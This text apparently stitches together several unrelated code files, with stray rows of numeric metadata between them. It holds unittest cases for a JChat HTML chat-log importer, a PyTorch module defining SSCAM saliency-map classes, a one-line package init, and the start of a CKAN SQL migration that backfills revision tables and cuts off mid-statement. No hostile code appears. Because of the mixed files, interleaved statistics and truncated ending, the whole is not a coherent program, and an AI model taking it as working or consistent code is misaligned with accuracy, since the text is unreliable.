YEAR_MONTH_ROLLOVER_PATH = os.path.join(
FILE_PATH, "jchat_importer_date_sensitive_files/year_month_rollover.html"
)
MODERN_FORMAT_PATH = os.path.join(FILE_PATH, "sample_data/jchat_files/jchat_modern_format.html")
LEGACY_NO_I_PATH = os.path.join(FILE_PATH, "sample_data/jchat_files/legacy_no_i.html")
COMBINED_FILE_PATH = os.path.join(FILE_PATH, "sample_data/jchat_files/combined_format.html")
class JChatTests(unittest.TestCase):
def setUp(self):
self.store = DataStore("", "", "", 0, ":memory:", db_type="sqlite")
self.store.initialise()
def tearDown(self):
pass
def test_no_file_suffix(self):
processor = FileProcessor(archive=False)
processor.register_importer(JChatImporter())
# check states empty
with self.store.session_scope():
# there must be no states at the beginning
comments = self.store.session.query(self.store.db_classes.Comment).all()
assert len(comments) == 0
# there must be no platforms at the beginning
platforms = self.store.session.query(self.store.db_classes.Platform).all()
assert len(platforms) == 0
# there must be no datafiles at the beginning
datafiles = self.store.session.query(self.store.db_classes.Datafile).all()
assert len(datafiles) == 0
# parse the data
processor.process(NO_EXT_PATH, self.store, False)
# check data got created
with self.store.session_scope():
# there must be states after the import
comments = self.store.session.query(self.store.db_classes.Comment).all()
assert len(comments) == 5
# there must be platforms after the import
platforms = self.store.session.query(self.store.db_classes.Platform).all()
assert len(platforms) == 2
# there must be one datafile afterwards
datafiles = self.store.session.query(self.store.db_classes.Datafile).all()
assert len(datafiles) == 1
results = (
self.store.session.query(self.store.db_classes.Comment)
.order_by(self.store.db_classes.Comment.time)
.all()
)
assert results[0].content == "COMMS TEST"
def test_breaks_in_message(self):
processor = FileProcessor(archive=False)
processor.register_importer(JChatImporter())
# check states empty
with self.store.session_scope():
# there must be no states at the beginning
comments = self.store.session.query(self.store.db_classes.Comment).all()
assert len(comments) == 0
# there must be no platforms at the beginning
platforms = self.store.session.query(self.store.db_classes.Platform).all()
assert len(platforms) == 0
# there must be no datafiles at the beginning
datafiles = self.store.session.query(self.store.db_classes.Datafile).all()
assert len(datafiles) == 0
# parse the data
processor.process(BREAKS_PATH, self.store, False)
# check data got created
with self.store.session_scope():
# there must be states after the import
comments = self.store.session.query(self.store.db_classes.Comment).all()
assert len(comments) == 3
# there must be platforms after the import
platforms = self.store.session.query(self.store.db_classes.Platform).all()
assert len(platforms) == 2
# there must be one datafile afterwards
datafiles = self.store.session.query(self.store.db_classes.Datafile).all()
assert len(datafiles) == 1
results = (
self.store.session.query(self.store.db_classes.Comment)
.order_by(self.store.db_classes.Comment.time)
.all()
)
assert results[0].content == "COMMS TEST"
assert results[1].content == "Replay bravo"
assert results[2].content == "Replay multiple bravos in same tag"
def test_existing_quad_with_new_quads(self):
processor = FileProcessor(archive=False)
processor.register_importer(JChatImporter())
# check states empty
with self.store.session_scope():
# there must be no states at the beginning
comments = self.store.session.query(self.store.db_classes.Comment).all()
assert len(comments) == 0
# there must be no platforms at the beginning
platforms = self.store.session.query(self.store.db_classes.Platform).all()
assert len(platforms) == 0
# there must be no datafiles at the beginning
datafiles = self.store.session.query(self.store.db_classes.Datafile).all()
assert len(datafiles) == 0
# parse the data
processor.process(DATA_PATH, self.store, False)
# check data got created
with self.store.session_scope():
# there must be states after the import
comments = self.store.session.query(self.store.db_classes.Comment).all()
assert len(comments) == 5
# there must be platforms after the import
platforms = self.store.session.query(self.store.db_classes.Platform).all()
assert len(platforms) == 3
# there must be one datafile afterwards
datafiles = self.store.session.query(self.store.db_classes.Datafile).all()
assert len(datafiles) == 1
results = (
self.store.session.query(self.store.db_classes.Comment)
.order_by(self.store.db_classes.Comment.time)
.all()
)
assert results[0].content == "COMMS TEST"
assert results[1].content == "Replay bravo"
assert results[2].content == "Replay bravo"
assert results[3].content == "Replay bravo - next day"
assert results[4].content == "Replay bravo - next month"
def test_html_character_representation(self):
processor = FileProcessor(archive=False)
processor.register_importer(JChatImporter())
# check states empty
with self.store.session_scope():
# there must be no states at the beginning
comments = self.store.session.query(self.store.db_classes.Comment).all()
assert len(comments) == 0
# there must be no platforms at the beginning
platforms = self.store.session.query(self.store.db_classes.Platform).all()
assert len(platforms) == 0
# there must be no datafiles at the beginning
datafiles = self.store.session.query(self.store.db_classes.Datafile).all()
assert len(datafiles) == 0
# parse the data
processor.process(UNUSUAL_CHARS_PATH, self.store, False)
# check data got created
with self.store.session_scope():
# there must be states after the import
comments = self.store.session.query(self.store.db_classes.Comment).all()
assert len(comments) == 3
# there must be platforms after the import
platforms = self.store.session.query(self.store.db_classes.Platform).all()
assert len(platforms) == 3
# there must be one datafile afterwards
datafiles = self.store.session.query(self.store.db_classes.Datafile).all()
assert len(datafiles) == 1
results = (
self.store.session.query(self.store.db_classes.Comment)
.order_by(self.store.db_classes.Comment.time)
.all()
)
assert unicodedata.normalize("NFKC", results[0].content) == "COMMS ’TEST"
assert unicodedata.normalize("NFKC", results[1].content) == "Replay&‘ ...bravo"
assert unicodedata.normalize("NFKC", results[2].content) == "Replay–bravo"
def test_room_connections_disconnections_ignored(self):
processor = FileProcessor(archive=False)
processor.register_importer(JChatImporter())
# check states empty
with self.store.session_scope():
# there must be no states at the beginning
comments = self.store.session.query(self.store.db_classes.Comment).all()
assert len(comments) == 0
# there must be no platforms at the beginning
platforms = self.store.session.query(self.store.db_classes.Platform).all()
assert len(platforms) == 0
# there must be no datafiles at the beginning
datafiles = self.store.session.query(self.store.db_classes.Datafile).all()
assert len(datafiles) == 0
# parse the data
processor.process(ROOM_MESSAGES_PATH, self.store, False)
# check data got created
with self.store.session_scope():
# there must be states after the import
comments = self.store.session.query(self.store.db_classes.Comment).all()
assert len(comments) == 2
# there must be platforms after the import
platforms = self.store.session.query(self.store.db_classes.Platform).all()
assert len(platforms) == 1
# there must be one datafile afterwards
datafiles = self.store.session.query(self.store.db_classes.Datafile).all()
assert len(datafiles) == 1
results = (
self.store.session.query(self.store.db_classes.Comment)
.order_by(self.store.db_classes.Comment.time)
.all()
)
assert results[0].content == "COMMS TEST"
assert results[1].content == "Replay bravo"
def test_modern_jchat_format(self):
processor = FileProcessor(archive=False)
processor.register_importer(JChatImporter())
# check states empty
with self.store.session_scope():
# there must be no states at the beginning
comments = self.store.session.query(self.store.db_classes.Comment).all()
assert len(comments) == 0
# there must be no platforms at the beginning
platforms = self.store.session.query(self.store.db_classes.Platform).all()
assert len(platforms) == 0
# there must be no datafiles at the beginning
datafiles = self.store.session.query(self.store.db_classes.Datafile).all()
assert len(datafiles) == 0
# parse the data
processor.process(MODERN_FORMAT_PATH, self.store, False)
# check data got created
with self.store.session_scope():
# there must be states after the import
comments = self.store.session.query(self.store.db_classes.Comment).all()
assert len(comments) == 3
# there must be platforms after the import
platforms = self.store.session.query(self.store.db_classes.Platform).all()
assert len(platforms) == 2
# there must be one datafile afterwards
datafiles = self.store.session.query(self.store.db_classes.Datafile).all()
assert len(datafiles) == 1
results = (
self.store.session.query(self.store.db_classes.Comment)
.order_by(self.store.db_classes.Comment.time)
.all()
)
assert len(results) == 3
assert results[0].content == "COMMS TEST"
assert results[1].content == "Replay bravo - no i tag and breaks"
assert results[2].content == "Replay bravo - no i tag"
def test_legacy_jchat_format_without_i_tag(self):
processor = FileProcessor(archive=False)
processor.register_importer(JChatImporter())
# check states empty
with self.store.session_scope():
# there must be no states at the beginning
comments = self.store.session.query(self.store.db_classes.Comment).all()
assert len(comments) == 0
# there must be no platforms at the beginning
platforms = self.store.session.query(self.store.db_classes.Platform).all()
assert len(platforms) == 0
# there must be no datafiles at the beginning
datafiles = self.store.session.query(self.store.db_classes.Datafile).all()
assert len(datafiles) == 0
# parse the data
processor.process(LEGACY_NO_I_PATH, self.store, False)
# check data got created
with self.store.session_scope():
# there must be states after the import
comments = self.store.session.query(self.store.db_classes.Comment).all()
assert len(comments) == 2
# there must be platforms after the import
platforms = self.store.session.query(self.store.db_classes.Platform).all()
assert len(platforms) == 1
# there must be one datafile afterwards
datafiles = self.store.session.query(self.store.db_classes.Datafile).all()
assert len(datafiles) == 1
results = (
self.store.session.query(self.store.db_classes.Comment)
.order_by(self.store.db_classes.Comment.time)
.all()
)
assert len(results) == 2
assert results[0].content == "COMMS TEST"
assert results[1].content == "COMMS TEST - no i"
def test_marker_messages_ignored(self):
processor = FileProcessor(archive=False)
processor.register_importer(JChatImporter())
# check states empty
with self.store.session_scope():
# there must be no states at the beginning
comments = self.store.session.query(self.store.db_classes.Comment).all()
assert len(comments) == 0
# there must be no platforms at the beginning
platforms = self.store.session.query(self.store.db_classes.Platform).all()
assert len(platforms) == 0
# there must be no datafiles at the beginning
datafiles = self.store.session.query(self.store.db_classes.Datafile).all()
assert len(datafiles) == 0
# parse the data
processor.process(MARKER_MESSAGES_PATH, self.store, False)
# check data got created
with self.store.session_scope():
# there must be states after the import
comments = self.store.session.query(self.store.db_classes.Comment).all()
assert len(comments) == 2
# there must be platforms after the import
platforms = self.store.session.query(self.store.db_classes.Platform).all()
assert len(platforms) == 1
# there must be one datafile afterwards
datafiles = self.store.session.query(self.store.db_classes.Datafile).all()
assert len(datafiles) == 1
results = (
self.store.session.query(self.store.db_classes.Comment)
.order_by(self.store.db_classes.Comment.time)
.all()
)
assert len(results) == 2
assert results[0].content == "COMMS TEST"
assert results[1].content == "Replay bravo"
def test_filename_with_dot_in_name_no_html_ext(self):
processor = FileProcessor(archive=False)
processor.register_importer(JChatImporter())
# check states empty
with self.store.session_scope():
# there must be no states at the beginning
comments = self.store.session.query(self.store.db_classes.Comment).all()
assert len(comments) == 0
# there must be no platforms at the beginning
platforms = self.store.session.query(self.store.db_classes.Platform).all()
assert len(platforms) == 0
# there must be no datafiles at the beginning
datafiles = self.store.session.query(self.store.db_classes.Datafile).all()
assert len(datafiles) == 0
# parse the data
processor.process(NO_HTML_EXT_DOT_IN_NAME_PATH, self.store, False)
# check data got created
with self.store.session_scope():
# there must be states after the import
comments = self.store.session.query(self.store.db_classes.Comment).all()
assert len(comments) == 3
# there must be platforms after the import
platforms = self.store.session.query(self.store.db_classes.Platform).all()
assert len(platforms) == 2
# there must be one datafile afterwards
datafiles = self.store.session.query(self.store.db_classes.Datafile).all()
assert len(datafiles) == 1
results = (
self.store.session.query(self.store.db_classes.Comment)
.order_by(self.store.db_classes.Comment.time)
.all()
)
assert results[0].content == "COMMS TEST"
assert results[1].content == "Replay bravo"
assert results[2].content == "Replay bravo"
def test_year_month_rollover(self):
processor = FileProcessor(archive=False)
importer = JChatImporter()
processor.register_importer(importer)
# check states empty
with self.store.session_scope():
# there must be no states at the beginning
comments = self.store.session.query(self.store.db_classes.Comment).all()
assert len(comments) == 0
# there must be no platforms at the beginning
platforms = self.store.session.query(self.store.db_classes.Platform).all()
assert len(platforms) == 0
# there must be no datafiles at the beginning
datafiles = self.store.session.query(self.store.db_classes.Datafile).all()
assert len(datafiles) == 0
# Fixed Year/month to avoid flaky tests
importer.year = 2020
importer.month = 10
# parse the data
processor.process(YEAR_MONTH_ROLLOVER_PATH, self.store, False)
# check data got created
with self.store.session_scope():
# there must be states after the import
comments = self.store.session.query(self.store.db_classes.Comment).all()
assert len(comments) == 6
# there must be platforms after the import
platforms = self.store.session.query(self.store.db_classes.Platform).all()
assert len(platforms) == 3
# there must be one datafile afterwards
datafiles = self.store.session.query(self.store.db_classes.Datafile).all()
assert len(datafiles) == 1
results = (
self.store.session.query(self.store.db_classes.Comment)
.order_by(self.store.db_classes.Comment.time)
.all()
)
assert results[0].time == datetime(2020, 10, 31, 8, 27, 44)
assert results[1].time == datetime(2020, 11, 1, 8, 29, 44)
assert results[2].time == datetime(2020, 11, 30, 9, 14, 44)
assert results[3].time == datetime(2020, 12, 1, 10, 28, 54)
assert results[4].time == datetime(2020, 12, 31, 1, 8, 9)
assert results[5].time == datetime(2021, 1, 1, 2, 8, 9)
def test_combined_format(self):
"""Testing a file with elements of both styles to help develop a more generic approach"""
processor = FileProcessor(archive=False)
processor.register_importer(JChatImporter())
# check states empty
with self.store.session_scope():
# there must be no states at the beginning
comments = self.store.session.query(self.store.db_classes.Comment).all()
assert len(comments) == 0
# there must be no platforms at the beginning
platforms = self.store.session.query(self.store.db_classes.Platform).all()
assert len(platforms) == 0
# there must be no datafiles at the beginning
datafiles = self.store.session.query(self.store.db_classes.Datafile).all()
assert len(datafiles) == 0
# parse the data
processor.process(COMBINED_FILE_PATH, self.store, False)
# check data got created
with self.store.session_scope():
# there must be states after the import
comments = self.store.session.query(self.store.db_classes.Comment).all()
assert len(comments) == 7
# there must be platforms after the import
platforms = self.store.session.query(self.store.db_classes.Platform).all()
assert len(platforms) == 5
# there must be one datafile afterwards
datafiles = self.store.session.query(self.store.db_classes.Datafile).all()
assert len(datafiles) == 1
results = (
self.store.session.query(self.store.db_classes.Comment)
.order_by(self.store.db_classes.Comment.time)
.all()
)
assert len(results) == 7
assert results[0].content == "Modern - has i tag"
assert results[1].content == "Modern - no i tag but has multiple breaks"
assert results[2].content == "Modern - no i tag - no breaks"
assert results[3].content == "Legacy - font a swap - no i tag - no breaks"
assert results[4].content == "Legacy - font a swap - has i tag - no breaks"
assert results[5].content == "Modern 2 - no i tag but has multiple breaks"
assert results[6].content == "Modern 2 - no i tag - no breaks"
def test_invalid_missing_timestamp(self):
html_string = """<html>
<head>
<style type="text/css">
<!--
span.msgcontent { color: #0 }
-->
</style>
</head>
<body>
<div id="34544=34534">
<b><a href=""><font>DAUN_AS</font></a></b>
<span class="msgcontent"><font><i>COMMS<br>TEST</i></font></span>
</div>
<body>
<html>"""
importer = JChatImporter()
check_errors_for_file_contents(
html_string,
"Unable to read message 34544=34534. Not enough parts (expecting timestamp, platform, message)",
importer,
"no_timestamp.html",
)
def test_invalid_invalid_timestamp(self):
html_string = """<html>
<head>
<style type="text/css">
<!--
span.msgcontent { color: #0 }
-->
</style>
</head>
<body>
<div id="34544=34534">
<tt><font>[2209744A]</font></tt>
<b><a href=""><font>DAUN_AS</font></a></b>
<span class="msgcontent"><font><i>COMMS<br>TEST</i></font></span>
</div>
<body>
<html>"""
importer = JChatImporter()
check_errors_for_file_contents(
html_string,
"Invalid JChat timestamp 2209744A at 34544=34534",
importer,
"invalid_timestamp.html",
)
def test_invalid_missing_platform(self):
html_string = """<html>
<head>
<style type="text/css">
<!--
span.msgcontent { color: #0 }
-->
</style>
</head>
<body>
<div id="34544=34534">
<tt><font>[22092744A]</font></tt>
<span class="msgcontent"><font><i>COMMS<br>TEST</i></font></span>
</div>
<body>
<html>"""
importer = JChatImporter()
check_errors_for_file_contents(
html_string,
"Unable to read message 34544=34534. Not enough parts (expecting timestamp, platform, message)",
importer,
"no_platform.html",
)
def test_invalid_missing_message(self):
html_string = """<html>
<head>
<style type="text/css">
<!--
span.msgcontent { color: #0 }
-->
</style>
</head>
<body>
<div id="34544=34534">
<tt><font>[22092744A]</font></tt>
<b><a href=""><font>DAUN_AS</font></a></b>
</div>
<body>
<html>"""
importer = JChatImporter()
check_errors_for_file_contents(
html_string,
"Unable to read message 34544=34534. Not enough parts (expecting timestamp, platform, message)",
importer,
"no_message",
)
def test_empty_message(self):
html_string = """<html>
<head>
<style type="text/css">
<!--
span.msgcontent { color: #0 }
-->
</style>
</head>
<body>
<div id="34544=34534">
<tt><font>[22092744A]</font></tt>
<b><a href=""><font>DAUN_AS</font></a></b>
<span class="msgcontent"><font></font></span>
</div>
<body>
<html>"""
importer = JChatImporter()
check_errors_for_file_contents(
html_string,
"Unable to read message 34544=34534. Not enough parts (expecting timestamp, platform, message)",
importer,
"no_message",
)
@staticmethod
def test_simplify_html_no_html():
simple_string = "A simple string with no tags"
result = JChatImporter.simplify_jchat_html(simple_string)
assert result == simple_string
@staticmethod
def test_simplify_html_no_banned_tags():
html_string = "<html><head>Test</head><body>A simple string with no tags</body></html>"
result = JChatImporter.simplify_jchat_html(html_string)
assert result == html_string
@staticmethod
def test_simplify_html_banned_tags():
html_string = """
<html>
<head> Header </head>
<body>
<div id="34544=34534">
<tt><font>[22092744A]</font></tt>
<b><a href=""><font>DAUN_AS</font></a></b>
<span class="msgcontent"><font><i>COMMS<br>TEST</i></font></span>
</div>
<body>
<html>"""
expected = """
<html>
<head> Header </head>
<body>
<div id="34544=34534">
<tt><font>[22092744A]</font></tt>
<b><a href=""><font>DAUN_AS</font></a></b>
<font>COMMS TEST</font>
</div>
<body>
<html>"""
result = JChatImporter.simplify_jchat_html(html_string)
assert result == expected
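# --- Hedged, illustrative sketch (not the project's actual simplify_jchat_html
# implementation): one way to reproduce the behaviour the tests above expect,
# using BeautifulSoup -- "<br>" collapses to a single space and wrapper tags
# such as <span>/<i> are unwrapped while their text is kept.
from bs4 import BeautifulSoup

def simplify_jchat_html_sketch(html_string: str) -> str:
    soup = BeautifulSoup(html_string, "html.parser")
    for br in soup.find_all("br"):
        br.replace_with(" ")            # "<br>" becomes a single space
    for name in ("span", "i"):          # banned wrapper tags: keep children, drop tag
        for tag in soup.find_all(name):
            tag.unwrap()
    return str(soup)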
| 40.896952
| 108
| 0.58968
| 3,273
| 28,178
| 4.961503
| 0.065383
| 0.110844
| 0.097543
| 0.097543
| 0.887247
| 0.862738
| 0.838722
| 0.833303
| 0.833303
| 0.828499
| 0
| 0.018945
| 0.305025
| 28,178
| 688
| 109
| 40.956395
| 0.810244
| 0.122613
| 0
| 0.751046
| 0
| 0.01046
| 0.193761
| 0.050288
| 0
| 0
| 0
| 0
| 0.230126
| 1
| 0.043933
| false
| 0.002092
| 0.075314
| 0
| 0.121339
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
97b9fcb9b87594b5cd601955cd193fd8e0ac892f
| 6,846
|
py
|
Python
|
deeppixel/cam/sscam.py
|
ls-da3m0ns/DeepPixel
|
1739502363a1fae6fb8c5c502bfdb018e585c6f7
|
[
"MIT"
] | null | null | null |
deeppixel/cam/sscam.py
|
ls-da3m0ns/DeepPixel
|
1739502363a1fae6fb8c5c502bfdb018e585c6f7
|
[
"MIT"
] | 3
|
2021-09-08T03:07:00.000Z
|
2022-03-12T00:56:04.000Z
|
deeppixel/cam/sscam.py
|
ls-da3m0ns/DeepPixel
|
1739502363a1fae6fb8c5c502bfdb018e585c6f7
|
[
"MIT"
] | null | null | null |
import torch
import torch.nn.functional as F
from torch.autograd import Variable  # Variable wraps the noise tensors used below
# NOTE (assumption): BaseCAM is provided elsewhere in this package; the exact
# module is not shown here, a likely import would be `from .basecam import BaseCAM`.
class SSCAM1(BaseCAM):
"""
SSCAM1, inherit from BaseCAM
"""
def __init__(self, model_dict):
super().__init__(model_dict)
def forward(self, input, class_idx=None, param_n=35, mean=0, sigma=2, retain_graph=False):
b, c, h, w = input.size()
# prediction on raw input
logit = self.model_arch(input)
if class_idx is None:
predicted_class = logit.max(1)[-1]
score = logit[:, logit.max(1)[-1]].squeeze()
else:
predicted_class = torch.LongTensor([class_idx])
score = logit[:, class_idx].squeeze()
logit = F.softmax(logit)
if torch.cuda.is_available():
predicted_class= predicted_class.cuda()
score = score.cuda()
logit = logit.cuda()
self.model_arch.zero_grad()
score.backward(retain_graph=retain_graph)
activations = self.activations['value']
b1, k, u, v = activations.size()
score_saliency_map = torch.zeros((1, 1, h, w))
if torch.cuda.is_available():
activations = activations.cuda()
score_saliency_map = score_saliency_map.cuda()
# HYPERPARAMETERS (can be modified for better/faster explanations);
# mean, param_n and sigma come from the function signature above.
# The original referenced an undefined `param_sigma_multiplier`, so bind it
# to the `sigma` argument here (default 2, matching the original comment).
param_sigma_multiplier = sigma
with torch.no_grad():
for i in range(k):
# upsampling
saliency_map = torch.unsqueeze(activations[:, i, :, :], 1)
saliency_map = F.interpolate(saliency_map, size=(h, w), mode='bilinear', align_corners=False)
if saliency_map.max() == saliency_map.min():
continue
x = saliency_map
if (torch.max(x) - torch.min(x)).item() == 0:
continue
else:
sigma = param_sigma_multiplier / (torch.max(x) - torch.min(x)).item()
score_list = []
noisy_list = []
# Adding noise to the upsampled activation map `x`
for _ in range(param_n):
noise = Variable(x.data.new(x.size()).normal_(mean, sigma**2))
noisy_img = x + noise
noisy_list.append(noisy_img)
output = self.model_arch(noisy_img * input)
output = F.softmax(output)
score = output[0][predicted_class]
score_list.append(score)
# Averaging the scores to introduce smoothing
score = sum(score_list) / len(score_list)
score_saliency_map += score * saliency_map
score_saliency_map = F.relu(score_saliency_map)
score_saliency_map_min, score_saliency_map_max = score_saliency_map.min(), score_saliency_map.max()
if score_saliency_map_min == score_saliency_map_max:
return None
score_saliency_map = (score_saliency_map - score_saliency_map_min).div(score_saliency_map_max - score_saliency_map_min).data
return score_saliency_map
def __call__(self, input, class_idx=None, retain_graph=False):
# pass retain_graph by keyword so it is not consumed by the param_n argument
return self.forward(input, class_idx, retain_graph=retain_graph)
class SSCAM2(BaseCAM):
"""
SSCAM2, inherit from BaseCAM
"""
def __init__(self, model_dict):
super().__init__(model_dict)
def forward(self, input, class_idx=None, param_n=35, mean=0, sigma=2, retain_graph=False):
b, c, h, w = input.size()
# prediction on raw input
logit = self.model_arch(input)
if class_idx is None:
predicted_class = logit.max(1)[-1]
score = logit[:, logit.max(1)[-1]].squeeze()
else:
predicted_class = torch.LongTensor([class_idx])
score = logit[:, class_idx].squeeze()
logit = F.softmax(logit)
if torch.cuda.is_available():
predicted_class= predicted_class.cuda()
score = score.cuda()
logit = logit.cuda()
self.model_arch.zero_grad()
score.backward(retain_graph=retain_graph)
activations = self.activations['value']
b1, k, u, v = activations.size()
score_saliency_map = torch.zeros((1, 1, h, w))
if torch.cuda.is_available():
activations = activations.cuda()
score_saliency_map = score_saliency_map.cuda()
# HYPERPARAMETERS (can be modified for better/faster explanations);
# mean, param_n and sigma come from the function signature above.
# The original referenced an undefined `param_sigma_multiplier`, so bind it
# to the `sigma` argument here (default 2, matching the original comment).
param_sigma_multiplier = sigma
with torch.no_grad():
for i in range(k):
# upsampling
saliency_map = torch.unsqueeze(activations[:, i, :, :], 1)
saliency_map = F.interpolate(saliency_map, size=(h, w), mode='bilinear', align_corners=False)
if saliency_map.max() == saliency_map.min():
continue
# Normalization
norm_saliency_map = (saliency_map - saliency_map.min()) / (saliency_map.max() - saliency_map.min())
x = input * norm_saliency_map
if (torch.max(x) - torch.min(x)).item() == 0:
continue
else:
sigma = param_sigma_multiplier / (torch.max(x) - torch.min(x)).item()
score_list = []
noisy_list = []
# Adding noise to the normalized input mask `x`
for i in range(param_n):
noise = Variable(x.data.new(x.size()).normal_(mean, sigma**2))
noisy_img = x + noise
noisy_list.append(noisy_img)
if torch.cuda.is_available():
    noisy_img = noisy_img.cuda()
output = self.model_arch(noisy_img)
output = F.softmax(output)
score = output[0][predicted_class]
score_list.append(score)
# Averaging the scores to introduce smoothing
score = sum(score_list) / len(score_list)
score_saliency_map += score * saliency_map
score_saliency_map = F.relu(score_saliency_map)
score_saliency_map_min, score_saliency_map_max = score_saliency_map.min(), score_saliency_map.max()
if score_saliency_map_min == score_saliency_map_max:
return None
score_saliency_map = (score_saliency_map - score_saliency_map_min).div(score_saliency_map_max - score_saliency_map_min).data
return score_saliency_map
def __call__(self, input, class_idx=None, retain_graph=False):
# pass retain_graph by keyword so it is not consumed by the param_n argument
return self.forward(input, class_idx, retain_graph=retain_graph)
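# --- Hedged, self-contained sketch of the smoothing idea used by the SSCAM
# classes above: perturb an input with Gaussian noise several times and average
# the softmax class scores. A toy model stands in for self.model_arch; all
# names and sizes here are illustrative assumptions, not part of the original file.
import torch
import torch.nn as nn
import torch.nn.functional as F

toy_model = nn.Sequential(nn.Conv2d(3, 8, 3, padding=1), nn.AdaptiveAvgPool2d(1), nn.Flatten(), nn.Linear(8, 10))
x = torch.randn(1, 3, 32, 32)          # stand-in for the (masked) input
param_n, mean, sigma = 8, 0.0, 0.1
scores = []
with torch.no_grad():
    for _ in range(param_n):
        noisy = x + torch.randn_like(x) * sigma + mean   # one noisy copy
        probs = F.softmax(toy_model(noisy), dim=1)
        scores.append(probs[0, 3])                       # score of an arbitrary class
smoothed_score = sum(scores) / len(scores)               # averaged (smoothed) score
print(float(smoothed_score))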
| 33.558824
| 132
| 0.560327
| 784
| 6,846
| 4.612245
| 0.153061
| 0.167312
| 0.168142
| 0.06969
| 0.938053
| 0.938053
| 0.915376
| 0.915376
| 0.915376
| 0.915376
| 0
| 0.009292
| 0.33976
| 6,846
| 204
| 133
| 33.558824
| 0.790708
| 0.079609
| 0
| 0.896552
| 0
| 0
| 0.004173
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.051724
| false
| 0
| 0.017241
| 0.017241
| 0.137931
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8ade034bb4e3c7ebaad6977b29ae5cc454ba85a7
| 109
|
py
|
Python
|
src/spyd/game/command/commands/__init__.py
|
DanSeraf/spyd
|
af893b7f9c67785613b25754eb2cf150523a9fe4
|
[
"Zlib"
] | 4
|
2015-05-05T16:44:42.000Z
|
2020-10-27T09:45:23.000Z
|
src/spyd/game/command/commands/__init__.py
|
DanSeraf/spyd
|
af893b7f9c67785613b25754eb2cf150523a9fe4
|
[
"Zlib"
] | null | null | null |
src/spyd/game/command/commands/__init__.py
|
DanSeraf/spyd
|
af893b7f9c67785613b25754eb2cf150523a9fe4
|
[
"Zlib"
] | 2
|
2016-12-13T22:21:08.000Z
|
2020-03-14T16:44:20.000Z
|
from spyd.utils.import_all import import_all
import_all(__file__, 'spyd.game.command.commands', ['__init__'])
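# --- Hedged sketch (an assumption, not spyd's actual utility): a typical
# import_all helper built on pkgutil/importlib -- import every module found
# next to the package's __init__.py except the names listed in `exclude`.
import importlib
import os
import pkgutil

def import_all(init_file, package_name, exclude):
    package_dir = os.path.dirname(init_file)
    for _, module_name, _ in pkgutil.iter_modules([package_dir]):
        if module_name not in exclude:
            importlib.import_module(package_name + "." + module_name)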
| 54.5
| 64
| 0.807339
| 16
| 109
| 4.8125
| 0.625
| 0.350649
| 0.38961
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.055046
| 109
| 2
| 64
| 54.5
| 0.747573
| 0
| 0
| 0
| 0
| 0
| 0.309091
| 0.236364
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
c10f5f17c7a6be734760e4d0f28cbe1e4b1c7f22
| 16,108
|
py
|
Python
|
ckan/migration/versions/039_add_expired_id_and_dates.py
|
okfde/ckankrzn
|
df4c1ed624f6751ac2a8f03527ff19e448d27dfb
|
[
"Apache-2.0"
] | 4
|
2017-06-12T15:18:30.000Z
|
2019-10-11T15:12:43.000Z
|
ckan/migration/versions/039_add_expired_id_and_dates.py
|
okfde/ckankrzn
|
df4c1ed624f6751ac2a8f03527ff19e448d27dfb
|
[
"Apache-2.0"
] | 64
|
2017-05-14T22:15:53.000Z
|
2020-03-08T15:26:49.000Z
|
ckan/migration/versions/039_add_expired_id_and_dates.py
|
okfde/ckankrzn
|
df4c1ed624f6751ac2a8f03527ff19e448d27dfb
|
[
"Apache-2.0"
] | 5
|
2017-04-06T21:18:38.000Z
|
2020-03-30T17:05:23.000Z
|
# encoding: utf-8
from migrate import *
import uuid
import datetime
def upgrade(migrate_engine):
id = uuid.uuid4()
make_missing_revisions = '''
-- make sure all tables have an entry in the revision_table
insert into revision values ('%(id)s' , '%(timestamp)s', 'admin', 'Admin: make sure every object has a row in a revision table', 'active');
insert into package_tag_revision (id,package_id,tag_id,revision_id,state,continuity_id) select id,package_id,tag_id, '%(id)s' ,state, id from package_tag where package_tag.id not in (select id from package_tag_revision);
insert into resource_revision (id,resource_group_id,url,format,description,position,revision_id,hash,state,extras,continuity_id) select id,resource_group_id,url,format,description,position, '%(id)s' ,hash,state,extras, id from resource where resource.id not in (select id from resource_revision);
insert into group_extra_revision (id,group_id,key,value,state,revision_id,continuity_id) select id,group_id,key,value,state, '%(id)s' , id from group_extra where group_extra.id not in (select id from group_extra_revision);
insert into resource_group_revision (id,package_id,label,sort_order,extras,state,revision_id,continuity_id) select id,package_id,label,sort_order,extras,state, '%(id)s', id from resource_group where resource_group.id not in (select id from resource_group_revision);
insert into package_extra_revision (id,package_id,key,value,revision_id,state,continuity_id) select id,package_id,key,value, '%(id)s',state, id from package_extra where package_extra.id not in (select id from package_extra_revision);
insert into package_relationship_revision (id,subject_package_id,object_package_id,type,comment,revision_id,state,continuity_id) select id,subject_package_id,object_package_id,type,comment, '%(id)s',state, id from package_relationship where package_relationship.id not in (select id from package_relationship_revision);
insert into group_revision (id,name,title,description,created,state,revision_id,continuity_id) select id,name,title,description,created,state, '%(id)s', id from "group" where "group".id not in (select id from group_revision);
insert into package_revision (id,name,title,url,notes,license_id,revision_id,version,author,author_email,maintainer,maintainer_email,state,continuity_id) select id,name,title,url,notes,license_id, '%(id)s',version,author,author_email,maintainer,maintainer_email,state, id from package where package.id not in (select id from package_revision);
''' % dict(id=id, timestamp=datetime.datetime.utcnow().isoformat())
update_schema = '''
ALTER TABLE package_revision
ADD COLUMN expired_id text,
